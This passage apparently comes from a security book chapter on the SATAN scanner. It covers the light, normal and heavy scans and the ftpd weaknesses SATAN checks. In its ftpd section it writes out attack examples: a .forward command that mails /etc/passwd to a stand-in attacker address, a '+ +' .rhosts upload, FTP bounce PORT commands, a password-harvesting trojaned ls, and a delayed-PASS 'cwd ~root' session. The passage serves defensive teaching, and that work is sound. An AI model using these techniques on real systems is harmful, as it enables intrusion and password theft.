Normal Scans

The normal scan does everything included in the light scan and adds scans of fingerd, various TCP services, and UDP services. Depending on the results, and the rules database, it optionally scans rusers, bootparam, and yp.

If the target is m2.notreal.com, the finger scan tries to finger -l the following: @m2.notreal.com, 0@m2.notreal.com, @@m2.notreal.com, root@m2.notreal.com, demo@m2.notreal.com, and guest@m2.notreal.com.

Next, SATAN does a TCP scan to see whether services are actively listening on ports for gopher, http, FTP, telnet, smtp, nntp, uucp, and X. SATAN then scans UDP ports for DNS and xdmcp.

If the portmap program reports that rusersd is available, SATAN then contacts rusersd and reports what users are logged in to the target and from what systems.

SATAN now tries to contact the rpc bootparam service to get the NIS domain name. It uses a list of client names based on hosts that show up in the NFS exports list from mountd.

If SATAN gets the domain name, it then runs a yp-chk program to try to get the passwd.byname map from the NIS server.

Heavy Scans

The heavy scan includes everything from the light and normal scans and adds a much larger search for active services. The TCP scan runs from port 1 to port 9999. (A comment in satan.cf indicates that a very heavy scan might want to run to 65535 instead of 9999.) The UDP scan runs from 1 to 2050 and from 32767 to 33500.

Finally, a heavy scan checks the remaining rules to see if any of the .satan scripts need to be run, based on the results of the previous port scans. For example, the ftp and rsh scripts are executed if these services are available.

Vulnerabilities that SATAN Investigates

SATAN includes checks for a number of common security vulnerabilities.

ftpd

SATAN checks to see whether the remote host offers anonymous FTP access. If it does, it checks to see if the ~ftp directory is writeable by the anonymous user. SATAN checks the banner line of the ftpd prompt to see if it is an old version of wu-ftpd.

The SATAN documentation explains how these checks correlate to known vulnerabilities. The documentation also gives an example of another security hole in ftpd—the possibility of a delayed PASS statement—but it does not actively look for this hole. The documentation also mentions that the ~ftp/etc/passwd file is a useful item, but SATAN does not attempt to retrieve this.

Take a minute to investigate each of these ftpd issues. First, the presence of anonymous FTP is not a security hole in itself. It does provide you with access to the remote system, which can enable you to probe for other holes.

A hacker with access to the ftp directory can upload a .rhosts file, perhaps containing + +, to permit access from any remote system. The hacker can then rlogin to the system using the FTP login account and gain access without typing a password. This can be prevented by indicating a shell of /bin/false in the /etc/passwd entry for FTP.

A hacker could upload a .forward file containing a command, such as |/bin/mail hacker@intruder.com < /etc/passwd, into the ~ftp directory. The hacker would just mail a message to FTP at the target site, causing the mail to be forwarded, as instructed, to the program that gets executed. The hacker can then use Crack to attack the passwords on the system.

SATAN does not look for writeable ~ftp/etc or ~ftp/bin directories, although it probably should. A system using ftpd with sublogins depends on ~ftp/etc/passwd for permitting access to users. If an anonymous user can modify this file, that user can gain access to subdirectories containing files from other users. Similarly, modification to utilities such as bin/ls or bin/sh can offer the intruder opportunity for attacks.

For example, imagine if the /bin/ls command were modified to fake a reason for a new password prompt. Some unsuspecting users might retype their password to this bogus prompt, and the modified /bin/ls could store this information. Because many ~ftp/etc/passwd files have the same information as the /etc/passwd, this could give the hacker a real login.

The wu-ftpd program had two vulnerabilities, CERT CA-93:06 and CA-94:07, that permitted remote users to gain access to the system. First, a race condition in the code permitted users to log in as root. Second, the SITE EXEC command permitted users to execute commands as root. Both of these problems have been fixed in recent versions of wu-ftpd.

The presence of an ~ftp/etc/passwd file with encrypted fields is another potential security hole. As mentioned earlier, the ~ftp/etc/passwd file is mainly used to map file uids to login names for directory listings, a service in which encrypted fields are not needed and can be commented out by replacing them with an *. For those ftp daemons that use sublogins, the encrypted fields are used for authentication.

However, these fields do not have to correspond to the /etc/passwd fields. Users should be required to have different passwords for anonymous sublogins and normal system logins. This is because a hacker will immediately run Crack against the ~ftp/etc/passwd file entries. SATAN does not get the ~ftp/etc/passwd file.

The previously mentioned ftpd server bounce problem is also not probed by SATAN. This problem could be checked by trying a PORT command with an IP address different than the originating source, or with a privileged TCP port number on the originating source. For example, if the hacker used FTP on a system with IP address 1.2.3.4, the hacker would specify PORT 1,2,3,4,0,25 to spoof e-mail onto his or her own system, or PORT 2,3,4,5,0,21 to spoof the IP address to the FTP port of the system at IP address 2.3.4.5. A fixed ftpd would not permit either action.

The delayed PASS command problem is documented in the SATAN white paper but is not investigated by SATAN because it represents a more active intrusion instead of a passive probe. As mentioned in the white paper, a remote user could gain root access by embedding a CWD/ command between the USER and PASS commands. For example, consider this exchange:

% ftp
ftp> open notreal.com
Connected to notreal.com
220 notreal.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password
ftp> quote cwd ~root
530 Please login with USER and PASS
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.